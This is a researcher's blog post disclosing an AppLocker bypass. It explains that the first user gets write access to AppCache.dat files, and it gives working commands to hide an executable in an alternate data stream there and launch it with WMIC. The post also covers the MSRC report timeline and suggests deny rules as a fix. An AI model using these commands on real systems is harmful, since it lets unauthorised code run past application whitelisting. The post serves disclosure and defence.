While I was prepping for a session a while back I made a a little special discovery about AppLocker. Turns out that the files that AppLocker uses under C:\Windows\System32\AppLocker can be used in many cases to bypass a Default AppLocker ruleset. When a machine is deployed and the first user logs in, that user will be added with full access to the following files under that folder:

AppCache.dat

AppCache.dat.LOG1

AppCache.dat.LOG2

This does not happen to any other users that logs onto the computer, only the first interactive logon after AppLocker is enabled.

So, how do we abuse this? Since it is likely that the first user that logs onto a computer is the main user. I was not able to directly write to the files since they are locked by AppLocker, but you can add additional Alternate Data Streams and get execution that way.

First you need to add the binary you want to execute into a stream of that file like this:

type evilfile.exe > C:\Windows\System32\AppLocker\AppCache.dat.LOG1:evil.exe

After the file is added to the stream you can verify it by running the following command:

dir /a /r c:\windows\system32\AppLocker\AppCache.dat.LOG1

When you want to execute it you can for instance use WMIC to do that:

wmic process call create 'C:\Windows\System32\AppLocker\AppCache.dat.LOG1:evil.exe'

If you want to know more about Alternate Data streams you can always go and check out my posts on the topic right here:

https://oddvar.moe/2018/01/14/putting-data-in-alternate-data-streams-and-how-to-execute-it/

https://oddvar.moe/2018/04/11/putting-data-in-alternate-data-streams-and-how-to-execute-it-part-2/

I did report this to MSRC, but it did not meet the level needed to be serviced. I knew that before I sent it, but still I wanted MSRC to be aware of this. It is stated in this post that AppLocker will not be serviced:

https://www.microsoft.com/en-us/msrc/windows-security-servicing-criteria

To fix this you should create a deny rules blocking execution from the C:\Windows\System32\AppLocker path, and also remember to block alternate data stream from the same folder.

Timeline

May 10. 2019 – Report sent to MSRC

May 10, 2019 – Automated response about MSRC received it

May 11, 2019 – Response from MSRC that the submission does not meet the bar for servicing

Also a shout-out to @notajungman that helped me to verify this in a production environment. Thanks!